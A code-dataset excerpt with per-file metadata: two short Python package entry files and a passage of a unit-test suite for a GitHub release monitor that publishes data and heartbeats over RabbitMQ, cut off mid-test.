hexsha
string | size
int64 | ext
string | lang
string | max_stars_repo_path
string | max_stars_repo_name
string | max_stars_repo_head_hexsha
string | max_stars_repo_licenses
list | max_stars_count
int64 | max_stars_repo_stars_event_min_datetime
string | max_stars_repo_stars_event_max_datetime
string | max_issues_repo_path
string | max_issues_repo_name
string | max_issues_repo_head_hexsha
string | max_issues_repo_licenses
list | max_issues_count
int64 | max_issues_repo_issues_event_min_datetime
string | max_issues_repo_issues_event_max_datetime
string | max_forks_repo_path
string | max_forks_repo_name
string | max_forks_repo_head_hexsha
string | max_forks_repo_licenses
list | max_forks_count
int64 | max_forks_repo_forks_event_min_datetime
string | max_forks_repo_forks_event_max_datetime
string | content
string | avg_line_length
float64 | max_line_length
int64 | alphanum_fraction
float64 | qsc_code_num_words_quality_signal
int64 | qsc_code_num_chars_quality_signal
float64 | qsc_code_mean_word_length_quality_signal
float64 | qsc_code_frac_words_unique_quality_signal
float64 | qsc_code_frac_chars_top_2grams_quality_signal
float64 | qsc_code_frac_chars_top_3grams_quality_signal
float64 | qsc_code_frac_chars_top_4grams_quality_signal
float64 | qsc_code_frac_chars_dupe_5grams_quality_signal
float64 | qsc_code_frac_chars_dupe_6grams_quality_signal
float64 | qsc_code_frac_chars_dupe_7grams_quality_signal
float64 | qsc_code_frac_chars_dupe_8grams_quality_signal
float64 | qsc_code_frac_chars_dupe_9grams_quality_signal
float64 | qsc_code_frac_chars_dupe_10grams_quality_signal
float64 | qsc_code_frac_chars_replacement_symbols_quality_signal
float64 | qsc_code_frac_chars_digital_quality_signal
float64 | qsc_code_frac_chars_whitespace_quality_signal
float64 | qsc_code_size_file_byte_quality_signal
float64 | qsc_code_num_lines_quality_signal
float64 | qsc_code_num_chars_line_max_quality_signal
float64 | qsc_code_num_chars_line_mean_quality_signal
float64 | qsc_code_frac_chars_alphabet_quality_signal
float64 | qsc_code_frac_chars_comments_quality_signal
float64 | qsc_code_cate_xml_start_quality_signal
float64 | qsc_code_frac_lines_dupe_lines_quality_signal
float64 | qsc_code_cate_autogen_quality_signal
float64 | qsc_code_frac_lines_long_string_quality_signal
float64 | qsc_code_frac_chars_string_length_quality_signal
float64 | qsc_code_frac_chars_long_word_length_quality_signal
float64 | qsc_code_frac_lines_string_concat_quality_signal
float64 | qsc_code_cate_encoded_data_quality_signal
float64 | qsc_code_frac_chars_hex_words_quality_signal
float64 | qsc_code_frac_lines_prompt_comments_quality_signal
float64 | qsc_code_frac_lines_assert_quality_signal
float64 | qsc_codepython_cate_ast_quality_signal
float64 | qsc_codepython_frac_lines_func_ratio_quality_signal
float64 | qsc_codepython_cate_var_zero_quality_signal
bool | qsc_codepython_frac_lines_pass_quality_signal
float64 | qsc_codepython_frac_lines_import_quality_signal
float64 | qsc_codepython_frac_lines_simplefunc_quality_signal
float64 | qsc_codepython_score_lines_no_logic_quality_signal
float64 | qsc_codepython_frac_lines_print_quality_signal
float64 | qsc_code_num_words
int64 | qsc_code_num_chars
int64 | qsc_code_mean_word_length
int64 | qsc_code_frac_words_unique
null | qsc_code_frac_chars_top_2grams
int64 | qsc_code_frac_chars_top_3grams
int64 | qsc_code_frac_chars_top_4grams
int64 | qsc_code_frac_chars_dupe_5grams
int64 | qsc_code_frac_chars_dupe_6grams
int64 | qsc_code_frac_chars_dupe_7grams
int64 | qsc_code_frac_chars_dupe_8grams
int64 | qsc_code_frac_chars_dupe_9grams
int64 | qsc_code_frac_chars_dupe_10grams
int64 | qsc_code_frac_chars_replacement_symbols
int64 | qsc_code_frac_chars_digital
int64 | qsc_code_frac_chars_whitespace
int64 | qsc_code_size_file_byte
int64 | qsc_code_num_lines
int64 | qsc_code_num_chars_line_max
int64 | qsc_code_num_chars_line_mean
int64 | qsc_code_frac_chars_alphabet
int64 | qsc_code_frac_chars_comments
int64 | qsc_code_cate_xml_start
int64 | qsc_code_frac_lines_dupe_lines
int64 | qsc_code_cate_autogen
int64 | qsc_code_frac_lines_long_string
int64 | qsc_code_frac_chars_string_length
int64 | qsc_code_frac_chars_long_word_length
int64 | qsc_code_frac_lines_string_concat
null | qsc_code_cate_encoded_data
int64 | qsc_code_frac_chars_hex_words
int64 | qsc_code_frac_lines_prompt_comments
int64 | qsc_code_frac_lines_assert
int64 | qsc_codepython_cate_ast
int64 | qsc_codepython_frac_lines_func_ratio
int64 | qsc_codepython_cate_var_zero
int64 | qsc_codepython_frac_lines_pass
int64 | qsc_codepython_frac_lines_import
int64 | qsc_codepython_frac_lines_simplefunc
int64 | qsc_codepython_score_lines_no_logic
int64 | qsc_codepython_frac_lines_print
int64 | effective
string | hits
int64 |
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
22bd82bdc6c6288bb884ba618b9541d654cbcf79
| 399
|
py
|
Python
|
src/models/lsun_bedroom_64_haar/__init__.py
|
YorkUCVIL/Wavelet-Flow
|
8d6d63fa116ec44299c32f37e66817594510f644
|
[
"MIT"
] | 59
|
2020-10-28T03:09:05.000Z
|
2022-01-29T22:10:04.000Z
|
src/models/lsun_bedroom_64_haar/__init__.py
|
YorkUCVIL/Wavelet-Flow
|
8d6d63fa116ec44299c32f37e66817594510f644
|
[
"MIT"
] | 4
|
2020-12-24T11:00:40.000Z
|
2021-05-22T06:14:27.000Z
|
src/models/lsun_bedroom_64_haar/__init__.py
|
YorkUCVIL/Wavelet-Flow
|
8d6d63fa116ec44299c32f37e66817594510f644
|
[
"MIT"
] | 2
|
2020-10-29T01:15:03.000Z
|
2021-04-20T11:55:51.000Z
|
from models.lsun_bedroom_64_haar.Training_data import *
from models.lsun_bedroom_64_haar.Validation_data import *
from models.lsun_bedroom_64_haar.Network_body import *
from models.lsun_bedroom_64_haar.Conditioning_network import *
import models.shared.routines as routines
from models.lsun_bedroom_64_haar.build_training_graph import *
model_config_path = 'data/lsun_bedroom_64_haar/config.hjson'
| 44.333333
| 62
| 0.87218
| 62
| 399
| 5.193548
| 0.354839
| 0.204969
| 0.242236
| 0.31677
| 0.5
| 0.5
| 0.332298
| 0.229814
| 0
| 0
| 0
| 0.032345
| 0.070175
| 399
| 8
| 63
| 49.875
| 0.83558
| 0
| 0
| 0
| 0
| 0
| 0.095238
| 0.095238
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0.857143
| 0
| 0.857143
| 0
| 0
| 0
| 0
| null | 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
|
0
| 6
|
22d8ca843d314d7e9bf1c2e2edaaf7d9640ded3f
| 308
|
py
|
Python
|
src/backend/aspen/main.py
|
chanzuckerberg/czgenepi
|
87bd2b1739acdfe2c7c25663fafb01dc24c5e2fd
|
[
"MIT"
] | null | null | null |
src/backend/aspen/main.py
|
chanzuckerberg/czgenepi
|
87bd2b1739acdfe2c7c25663fafb01dc24c5e2fd
|
[
"MIT"
] | 30
|
2022-02-01T23:19:14.000Z
|
2022-03-29T19:34:20.000Z
|
src/backend/aspen/main.py
|
chanzuckerberg/czgenepi
|
87bd2b1739acdfe2c7c25663fafb01dc24c5e2fd
|
[
"MIT"
] | null | null | null |
# this is where flask finds the entry point for the application.
from aspen.app.app import application # noqa: F401
from aspen.app.views.auth import callback_handling, login, logout # noqa: F401
from aspen.app.views.health import health # noqa: F401
from aspen.app.views.index import serve # noqa: F401
| 44
| 79
| 0.772727
| 49
| 308
| 4.836735
| 0.510204
| 0.151899
| 0.202532
| 0.21519
| 0.316456
| 0.316456
| 0
| 0
| 0
| 0
| 0
| 0.045977
| 0.152597
| 308
| 6
| 80
| 51.333333
| 0.862069
| 0.344156
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 6
|
fe162383c173d4c3968dd1d1f10e7f17994e8f8d
| 39,500
|
py
|
Python
|
alerter/test/monitors/test_github.py
|
SimplyVC/panic
|
2f5c327ea0d14b6a49dc8f4599a255048bc2ff6d
|
[
"Apache-2.0"
] | 41
|
2019-08-23T12:40:42.000Z
|
2022-03-28T11:06:02.000Z
|
alerter/test/monitors/test_github.py
|
SimplyVC/panic
|
2f5c327ea0d14b6a49dc8f4599a255048bc2ff6d
|
[
"Apache-2.0"
] | 147
|
2019-08-30T22:09:48.000Z
|
2022-03-30T08:46:26.000Z
|
alerter/test/monitors/test_github.py
|
SimplyVC/panic
|
2f5c327ea0d14b6a49dc8f4599a255048bc2ff6d
|
[
"Apache-2.0"
] | 3
|
2019-09-03T21:12:28.000Z
|
2021-08-18T14:27:56.000Z
|
import json
import logging
import unittest
from datetime import datetime
from datetime import timedelta
from http.client import IncompleteRead
from unittest import mock
import pika
import pika.exceptions
from freezegun import freeze_time
from requests.exceptions import (ConnectionError as ReqConnectionError,
ReadTimeout, ChunkedEncodingError)
from urllib3.exceptions import ProtocolError
from src.configs.repo import RepoConfig
from src.message_broker.rabbitmq import RabbitMQApi
from src.monitors.github import GitHubMonitor
from src.utils import env
from src.utils.constants.rabbitmq import (RAW_DATA_EXCHANGE,
HEALTH_CHECK_EXCHANGE,
GITHUB_RAW_DATA_ROUTING_KEY,
HEARTBEAT_OUTPUT_WORKER_ROUTING_KEY,
TOPIC)
from src.utils.exceptions import (PANICException, GitHubAPICallException,
CannotAccessGitHubPageException,
DataReadingException, JSONDecodeException,
MessageWasNotDeliveredException)
class TestGitHubMonitor(unittest.TestCase):
def setUp(self) -> None:
self.dummy_logger = logging.getLogger('Dummy')
self.dummy_logger.disabled = True
self.connection_check_time_interval = timedelta(seconds=0)
self.rabbit_ip = env.RABBIT_IP
self.rabbitmq = RabbitMQApi(
self.dummy_logger, self.rabbit_ip,
connection_check_time_interval=self.connection_check_time_interval)
self.monitor_name = 'test_monitor'
self.monitoring_period = 10
self.repo_id = 'test_repo_id'
self.parent_id = 'test_parent_id'
self.repo_name = 'test_repo'
self.monitor_repo = True
self.releases_page = 'test_url'
self.routing_key = 'test_routing_key'
self.test_data_str = 'test data'
self.test_data_dict = {
'test_key_1': 'test_val_1',
'test_key_2': 'test_val_2',
}
self.test_heartbeat = {
'component_name': 'Test Component',
'is_alive': True,
'timestamp': datetime(2012, 1, 1).timestamp(),
}
self.test_queue_name = 'Test Queue'
# In the real retrieved data there are more fields, but these are the
# only ones that interest us so far.
self.retrieved_metrics_example = [
{'name': 'First Release 😮', 'tag_name': 'v1.0.0'},
{'name': 'Release Candidate 1', 'tag_name': 'v0.1.0'},
]
self.processed_data_example = {
'0': {'release_name': 'First Release 😮', 'tag_name': 'v1.0.0'},
'1': {'release_name': 'Release Candidate 1', 'tag_name': 'v0.1.0'},
}
self.test_exception = PANICException('test_exception', 1)
self.repo_config = RepoConfig(self.repo_id, self.parent_id,
self.repo_name, self.monitor_repo,
self.releases_page)
self.test_monitor = GitHubMonitor(self.monitor_name, self.repo_config,
self.dummy_logger,
self.monitoring_period, self.rabbitmq)
def tearDown(self) -> None:
# Delete any queues and exchanges which are common across many tests
try:
self.test_monitor.rabbitmq.connect()
# Declare them before just in case there are tests which do not
# use these queues and exchanges
self.test_monitor.rabbitmq.queue_declare(
queue=self.test_queue_name, durable=True, exclusive=False,
auto_delete=False, passive=False
)
self.test_monitor.rabbitmq.exchange_declare(
HEALTH_CHECK_EXCHANGE, TOPIC, False, True, False, False)
self.test_monitor.rabbitmq.exchange_declare(
RAW_DATA_EXCHANGE, TOPIC, False, True, False, False)
self.test_monitor.rabbitmq.queue_purge(self.test_queue_name)
self.test_monitor.rabbitmq.queue_delete(self.test_queue_name)
self.test_monitor.rabbitmq.exchange_delete(RAW_DATA_EXCHANGE)
self.test_monitor.rabbitmq.exchange_delete(HEALTH_CHECK_EXCHANGE)
self.test_monitor.rabbitmq.disconnect()
except Exception as e:
print("Deletion of queues and exchanges failed: {}".format(e))
self.dummy_logger = None
self.rabbitmq = None
self.test_exception = None
self.repo_config = None
self.test_monitor = None
def test_str_returns_monitor_name(self) -> None:
self.assertEqual(self.monitor_name, str(self.test_monitor))
def test_get_monitor_period_returns_monitor_period(self) -> None:
self.assertEqual(self.monitoring_period,
self.test_monitor.monitor_period)
def test_get_monitor_name_returns_monitor_name(self) -> None:
self.assertEqual(self.monitor_name, self.test_monitor.monitor_name)
def test_repo_config_returns_repo_config(self) -> None:
self.assertEqual(self.repo_config, self.test_monitor.repo_config)
def test_initialise_rabbitmq_initialises_everything_as_expected(
self) -> None:
try:
# To make sure that there is no connection/channel already
# established
self.assertIsNone(self.rabbitmq.connection)
self.assertIsNone(self.rabbitmq.channel)
# To make sure that the exchanges have not already been declared
self.rabbitmq.connect()
self.rabbitmq.exchange_delete(RAW_DATA_EXCHANGE)
self.rabbitmq.exchange_delete(HEALTH_CHECK_EXCHANGE)
self.rabbitmq.disconnect()
self.test_monitor._initialise_rabbitmq()
# Perform checks that the connection has been opened, marked as open
# and that the delivery confirmation variable is set.
self.assertTrue(self.test_monitor.rabbitmq.is_connected)
self.assertTrue(self.test_monitor.rabbitmq.connection.is_open)
self.assertTrue(
self.test_monitor.rabbitmq.channel._delivery_confirmation)
# Check whether the exchange has been creating by sending messages
# to it. If this fails an exception is raised, hence the test fails.
self.test_monitor.rabbitmq.basic_publish_confirm(
exchange=RAW_DATA_EXCHANGE, routing_key=self.routing_key,
body=self.test_data_str, is_body_dict=False,
properties=pika.BasicProperties(delivery_mode=2),
mandatory=False)
self.test_monitor.rabbitmq.basic_publish_confirm(
exchange=HEALTH_CHECK_EXCHANGE, routing_key=self.routing_key,
body=self.test_data_str, is_body_dict=False,
properties=pika.BasicProperties(delivery_mode=2),
mandatory=False)
except Exception as e:
self.fail("Test failed: {}".format(e))
@mock.patch.object(GitHubMonitor, "_process_retrieved_data")
@mock.patch.object(GitHubMonitor, "_process_error")
def test_process_data_calls_process_error_on_retrieval_error(
self, mock_process_error, mock_process_retrieved_data) -> None:
# Do not test the processing of data for now
mock_process_error.return_value = self.test_data_dict
self.test_monitor._process_data(True, [self.test_exception],
[self.test_data_dict])
# Test passes if _process_error is called once and
# process_retrieved_data is not called
self.assertEqual(1, mock_process_error.call_count)
self.assertEqual(0, mock_process_retrieved_data.call_count)
@mock.patch.object(GitHubMonitor, "_process_retrieved_data")
@mock.patch.object(GitHubMonitor, "_process_error")
def test_process_data_calls_process_retrieved_data_on_retrieval_success(
self, mock_process_error, mock_process_retrieved_data) -> None:
# Do not test the processing of data for now
mock_process_retrieved_data.return_value = self.test_data_dict
self.test_monitor._process_data(False, [], [self.test_data_dict])
# Test passes if _process_error is called once and
# process_retrieved_data is not called
self.assertEqual(0, mock_process_error.call_count)
self.assertEqual(1, mock_process_retrieved_data.call_count)
def test_send_heartbeat_sends_a_heartbeat_correctly(self) -> None:
# This test creates a queue which receives messages with the same
# routing key as the ones sent by send_heartbeat, and checks that the
# heartbeat is received
try:
self.test_monitor._initialise_rabbitmq()
# Delete the queue before to avoid messages in the queue on error.
self.test_monitor.rabbitmq.queue_delete(self.test_queue_name)
res = self.test_monitor.rabbitmq.queue_declare(
queue=self.test_queue_name, durable=True, exclusive=False,
auto_delete=False, passive=False
)
self.assertEqual(0, res.method.message_count)
self.test_monitor.rabbitmq.queue_bind(
queue=self.test_queue_name, exchange=HEALTH_CHECK_EXCHANGE,
routing_key=HEARTBEAT_OUTPUT_WORKER_ROUTING_KEY)
self.test_monitor._send_heartbeat(self.test_heartbeat)
# By re-declaring the queue again we can get the number of messages
# in the queue.
res = self.test_monitor.rabbitmq.queue_declare(
queue=self.test_queue_name, durable=True, exclusive=False,
auto_delete=False, passive=True
)
self.assertEqual(1, res.method.message_count)
# Check that the message received is actually the HB
_, _, body = self.test_monitor.rabbitmq.basic_get(
self.test_queue_name)
self.assertEqual(self.test_heartbeat, json.loads(body))
except Exception as e:
self.fail("Test failed: {}".format(e))
def test_display_data_returns_the_correct_string(self) -> None:
expected_output = json.dumps(self.processed_data_example,
ensure_ascii=False).encode('utf8').decode()
actual_output = self.test_monitor._display_data(
self.processed_data_example)
self.assertEqual(expected_output, actual_output)
@freeze_time("2012-01-01")
def test_process_error_returns_expected_data(self) -> None:
expected_output = {
'error': {
'meta_data': {
'monitor_name': self.test_monitor.monitor_name,
'repo_name': self.test_monitor.repo_config.repo_name,
'repo_id': self.test_monitor.repo_config.repo_id,
'repo_parent_id': self.test_monitor.repo_config.parent_id,
'time': datetime(2012, 1, 1).timestamp()
},
'message': self.test_exception.message,
'code': self.test_exception.code,
}
}
actual_output = self.test_monitor._process_error(self.test_exception)
self.assertEqual(actual_output, expected_output)
@freeze_time("2012-01-01")
def test_process_retrieved_data_returns_expected_data(self) -> None:
expected_output = {
'result': {
'meta_data': {
'monitor_name': self.test_monitor.monitor_name,
'repo_name': self.test_monitor.repo_config.repo_name,
'repo_id': self.test_monitor.repo_config.repo_id,
'repo_parent_id': self.test_monitor.repo_config.parent_id,
'time': datetime(2012, 1, 1).timestamp()
},
'data': self.processed_data_example,
}
}
actual_output = self.test_monitor._process_retrieved_data(
self.retrieved_metrics_example)
self.assertEqual(expected_output, actual_output)
def test_send_data_sends_data_correctly(self) -> None:
# This test creates a queue which receives messages with the same
# routing key as the ones sent by send_data, and checks that the
# data is received
try:
self.test_monitor._initialise_rabbitmq()
# Delete the queue before to avoid messages in the queue on error.
self.test_monitor.rabbitmq.queue_delete(self.test_queue_name)
res = self.test_monitor.rabbitmq.queue_declare(
queue=self.test_queue_name, durable=True, exclusive=False,
auto_delete=False, passive=False
)
self.assertEqual(0, res.method.message_count)
self.test_monitor.rabbitmq.queue_bind(
queue=self.test_queue_name, exchange=RAW_DATA_EXCHANGE,
routing_key=GITHUB_RAW_DATA_ROUTING_KEY)
self.test_monitor._send_data(self.processed_data_example)
# By re-declaring the queue again we can get the number of messages
# in the queue.
res = self.test_monitor.rabbitmq.queue_declare(
queue=self.test_queue_name, durable=True, exclusive=False,
auto_delete=False, passive=True
)
self.assertEqual(1, res.method.message_count)
# Check that the message received is actually the processed data
_, _, body = self.test_monitor.rabbitmq.basic_get(
self.test_queue_name)
self.assertEqual(self.processed_data_example, json.loads(body))
except Exception as e:
self.fail("Test failed: {}".format(e))
@freeze_time("2012-01-01")
@mock.patch.object(GitHubMonitor, "_get_data")
def test_monitor_sends_data_and_hb_if_data_retrieve_and_processing_success(
self, mock_get_data) -> None:
expected_output_data = {
'result': {
'meta_data': {
'monitor_name': self.test_monitor.monitor_name,
'repo_name': self.test_monitor.repo_config.repo_name,
'repo_id': self.test_monitor.repo_config.repo_id,
'repo_parent_id': self.test_monitor.repo_config.parent_id,
'time': datetime(2012, 1, 1).timestamp()
},
'data': self.processed_data_example,
}
}
expected_output_hb = {
'component_name': self.test_monitor.monitor_name,
'is_alive': True,
'timestamp': datetime(2012, 1, 1).timestamp()
}
try:
mock_get_data.return_value = self.retrieved_metrics_example
self.test_monitor._initialise_rabbitmq()
# Delete the queue before to avoid messages in the queue on error.
self.test_monitor.rabbitmq.queue_delete(self.test_queue_name)
res = self.test_monitor.rabbitmq.queue_declare(
queue=self.test_queue_name, durable=True, exclusive=False,
auto_delete=False, passive=False
)
self.assertEqual(0, res.method.message_count)
self.test_monitor.rabbitmq.queue_bind(
queue=self.test_queue_name, exchange=RAW_DATA_EXCHANGE,
routing_key=GITHUB_RAW_DATA_ROUTING_KEY)
self.test_monitor.rabbitmq.queue_bind(
queue=self.test_queue_name, exchange=HEALTH_CHECK_EXCHANGE,
routing_key=HEARTBEAT_OUTPUT_WORKER_ROUTING_KEY)
self.test_monitor._monitor()
# By re-declaring the queue again we can get the number of messages
# in the queue.
res = self.test_monitor.rabbitmq.queue_declare(
queue=self.test_queue_name, durable=True, exclusive=False,
auto_delete=False, passive=True
)
# There must be 2 messages in the queue, the heartbeat and the
# processed data
self.assertEqual(2, res.method.message_count)
# Check that the message received is actually the processed data
_, _, body = self.test_monitor.rabbitmq.basic_get(
self.test_queue_name)
self.assertEqual(expected_output_data, json.loads(body))
# Check that the message received is actually the HB
_, _, body = self.test_monitor.rabbitmq.basic_get(
self.test_queue_name)
self.assertEqual(expected_output_hb, json.loads(body))
except Exception as e:
self.fail("Test failed: {}".format(e))
@mock.patch.object(GitHubMonitor, "_process_data")
@mock.patch.object(GitHubMonitor, "_get_data")
def test_monitor_sends_no_data_and_hb_if_data_ret_success_and_proc_fails(
self, mock_get_data, mock_process_data) -> None:
mock_process_data.side_effect = self.test_exception
mock_get_data.return_value = self.retrieved_metrics_example
try:
self.test_monitor._initialise_rabbitmq()
# Delete the queue before to avoid messages in the queue on error.
self.test_monitor.rabbitmq.queue_delete(self.test_queue_name)
res = self.test_monitor.rabbitmq.queue_declare(
queue=self.test_queue_name, durable=True, exclusive=False,
auto_delete=False, passive=False
)
self.assertEqual(0, res.method.message_count)
self.test_monitor.rabbitmq.queue_bind(
queue=self.test_queue_name, exchange=RAW_DATA_EXCHANGE,
routing_key=GITHUB_RAW_DATA_ROUTING_KEY)
self.test_monitor.rabbitmq.queue_bind(
queue=self.test_queue_name, exchange=HEALTH_CHECK_EXCHANGE,
routing_key=HEARTBEAT_OUTPUT_WORKER_ROUTING_KEY)
self.test_monitor._monitor()
# By re-declaring the queue again we can get the number of messages
# in the queue.
res = self.test_monitor.rabbitmq.queue_declare(
queue=self.test_queue_name, durable=True, exclusive=False,
auto_delete=False, passive=True
)
# There must be 0 messages in the queue.
self.assertEqual(0, res.method.message_count)
except Exception as e:
self.fail("Test failed: {}".format(e))
@mock.patch.object(GitHubMonitor, "_get_data")
def test_monitor_sends_no_data_and_no_hb_on_get_data_unexpected_exception(
self, mock_get_data) -> None:
mock_get_data.side_effect = self.test_exception
try:
self.test_monitor._initialise_rabbitmq()
# Delete the queue before to avoid messages in the queue on error.
self.test_monitor.rabbitmq.queue_delete(self.test_queue_name)
res = self.test_monitor.rabbitmq.queue_declare(
queue=self.test_queue_name, durable=True, exclusive=False,
auto_delete=False, passive=False
)
self.assertEqual(0, res.method.message_count)
self.test_monitor.rabbitmq.queue_bind(
queue=self.test_queue_name, exchange=RAW_DATA_EXCHANGE,
routing_key=GITHUB_RAW_DATA_ROUTING_KEY)
self.test_monitor.rabbitmq.queue_bind(
queue=self.test_queue_name, exchange=HEALTH_CHECK_EXCHANGE,
routing_key=HEARTBEAT_OUTPUT_WORKER_ROUTING_KEY)
self.assertRaises(PANICException, self.test_monitor._monitor)
# By re-declaring the queue again we can get the number of messages
# in the queue.
res = self.test_monitor.rabbitmq.queue_declare(
queue=self.test_queue_name, durable=True, exclusive=False,
auto_delete=False, passive=True
)
# There must be 0 messages in the queue.
self.assertEqual(0, res.method.message_count)
except Exception as e:
self.fail("Test failed: {}".format(e))
@freeze_time("2012-01-01")
@mock.patch.object(GitHubMonitor, "_get_data")
def test_monitor_sends_gh_api_call_exception_data_and_hb_on_api_call_err(
self, mock_get_data) -> None:
api_call_err_return = {
"message": "Not Found",
"documentation_url":
"https://docs.github.com/rest/reference/repos#list-releases"
}
mock_get_data.return_value = api_call_err_return
data_ret_exception = GitHubAPICallException(
api_call_err_return['message'])
expected_output_data = {
'error': {
'meta_data': {
'monitor_name': self.test_monitor.monitor_name,
'repo_name': self.test_monitor.repo_config.repo_name,
'repo_id': self.test_monitor.repo_config.repo_id,
'repo_parent_id': self.test_monitor.repo_config.parent_id,
'time': datetime(2012, 1, 1).timestamp()
},
'message': data_ret_exception.message,
'code': data_ret_exception.code,
}
}
expected_output_hb = {
'component_name': self.test_monitor.monitor_name,
'is_alive': True,
'timestamp': datetime(2012, 1, 1).timestamp()
}
try:
self.test_monitor._initialise_rabbitmq()
# Delete the queue before to avoid messages in the queue on error.
self.test_monitor.rabbitmq.queue_delete(self.test_queue_name)
res = self.test_monitor.rabbitmq.queue_declare(
queue=self.test_queue_name, durable=True, exclusive=False,
auto_delete=False, passive=False
)
self.assertEqual(0, res.method.message_count)
self.test_monitor.rabbitmq.queue_bind(
queue=self.test_queue_name, exchange=RAW_DATA_EXCHANGE,
routing_key=GITHUB_RAW_DATA_ROUTING_KEY)
self.test_monitor.rabbitmq.queue_bind(
queue=self.test_queue_name, exchange=HEALTH_CHECK_EXCHANGE,
routing_key=HEARTBEAT_OUTPUT_WORKER_ROUTING_KEY)
self.test_monitor._monitor()
# By re-declaring the queue again we can get the number of messages
# in the queue.
res = self.test_monitor.rabbitmq.queue_declare(
queue=self.test_queue_name, durable=True, exclusive=False,
auto_delete=False, passive=True
)
# There must be 2 messages in the queue, the heartbeat and the
# exception details.
self.assertEqual(2, res.method.message_count)
# Check that the message received is actually the processed data
_, _, body = self.test_monitor.rabbitmq.basic_get(
self.test_queue_name)
self.assertEqual(expected_output_data, json.loads(body))
# Check that the message received is actually the HB
_, _, body = self.test_monitor.rabbitmq.basic_get(
self.test_queue_name)
self.assertEqual(expected_output_hb, json.loads(body))
except Exception as e:
self.fail("Test failed: {}".format(e))
@freeze_time("2012-01-01")
@mock.patch.object(GitHubMonitor, "_get_data")
def test_monitor_sends_exception_data_and_hb_on_expected_exceptions(
self, mock_get_data) -> None:
json_decode_error = json.JSONDecodeError(msg='test error', doc='test',
pos=2)
errors_exceptions_dict = {
ReqConnectionError('test'): CannotAccessGitHubPageException(
self.repo_config.releases_page),
ReadTimeout('test'): CannotAccessGitHubPageException(
self.repo_config.releases_page),
IncompleteRead('test'): DataReadingException(
self.monitor_name, self.repo_config.releases_page),
ChunkedEncodingError('test'): DataReadingException(
self.monitor_name, self.repo_config.releases_page),
ProtocolError('test'): DataReadingException(
self.monitor_name, self.repo_config.releases_page),
json_decode_error: JSONDecodeException(json_decode_error)
}
try:
self.test_monitor._initialise_rabbitmq()
for error, data_ret_exception in errors_exceptions_dict.items():
mock_get_data.side_effect = error
expected_output_data = {
'error': {
'meta_data': {
'monitor_name': self.test_monitor.monitor_name,
'repo_name':
self.test_monitor.repo_config.repo_name,
'repo_id': self.test_monitor.repo_config.repo_id,
'repo_parent_id':
self.test_monitor.repo_config.parent_id,
'time': datetime(2012, 1, 1).timestamp()
},
'message': data_ret_exception.message,
'code': data_ret_exception.code,
}
}
expected_output_hb = {
'component_name': self.test_monitor.monitor_name,
'is_alive': True,
'timestamp': datetime(2012, 1, 1).timestamp()
}
# Delete the queue before to avoid messages in the queue on
# error.
self.test_monitor.rabbitmq.queue_delete(self.test_queue_name)
res = self.test_monitor.rabbitmq.queue_declare(
queue=self.test_queue_name, durable=True, exclusive=False,
auto_delete=False, passive=False
)
self.assertEqual(0, res.method.message_count)
self.test_monitor.rabbitmq.queue_bind(
queue=self.test_queue_name, exchange=RAW_DATA_EXCHANGE,
routing_key=GITHUB_RAW_DATA_ROUTING_KEY)
self.test_monitor.rabbitmq.queue_bind(
queue=self.test_queue_name, exchange=HEALTH_CHECK_EXCHANGE,
routing_key=HEARTBEAT_OUTPUT_WORKER_ROUTING_KEY)
self.test_monitor._monitor()
# By re-declaring the queue again we can get the number of
# messages in the queue.
res = self.test_monitor.rabbitmq.queue_declare(
queue=self.test_queue_name, durable=True, exclusive=False,
auto_delete=False, passive=True
)
# There must be 2 messages in the queue, the heartbeat and the
# processed data
self.assertEqual(2, res.method.message_count)
# Check that the message received is actually the processed data
_, _, body = self.test_monitor.rabbitmq.basic_get(
self.test_queue_name)
self.assertEqual(expected_output_data, json.loads(body))
# Check that the message received is actually the HB
_, _, body = self.test_monitor.rabbitmq.basic_get(
self.test_queue_name)
self.assertEqual(expected_output_hb, json.loads(body))
except Exception as e:
self.fail("Test failed: {}".format(e))
@mock.patch.object(GitHubMonitor, "_get_data")
def test_monitor_raises_msg_not_delivered_exception_if_data_not_routed(
self, mock_get_data) -> None:
mock_get_data.return_value = self.retrieved_metrics_example
try:
self.test_monitor._initialise_rabbitmq()
self.assertRaises(MessageWasNotDeliveredException,
self.test_monitor._monitor)
except Exception as e:
self.fail("Test failed: {}".format(e))
@freeze_time("2012-01-01")
@mock.patch.object(GitHubMonitor, "_get_data")
def test_monitor_raises_msg_not_del_except_if_hb_not_routed_and_sends_data(
self, mock_get_data) -> None:
mock_get_data.return_value = self.retrieved_metrics_example
expected_output_data = {
'result': {
'meta_data': {
'monitor_name': self.test_monitor.monitor_name,
'repo_name': self.test_monitor.repo_config.repo_name,
'repo_id': self.test_monitor.repo_config.repo_id,
'repo_parent_id': self.test_monitor.repo_config.parent_id,
'time': datetime(2012, 1, 1).timestamp()
},
'data': self.processed_data_example,
}
}
try:
self.test_monitor._initialise_rabbitmq()
self.test_monitor.rabbitmq.queue_delete(self.test_queue_name)
res = self.test_monitor.rabbitmq.queue_declare(
queue=self.test_queue_name, durable=True, exclusive=False,
auto_delete=False, passive=False
)
self.assertEqual(0, res.method.message_count)
self.test_monitor.rabbitmq.queue_bind(
queue=self.test_queue_name, exchange=RAW_DATA_EXCHANGE,
routing_key=GITHUB_RAW_DATA_ROUTING_KEY)
self.assertRaises(MessageWasNotDeliveredException,
self.test_monitor._monitor)
# By re-declaring the queue again we can get the number of
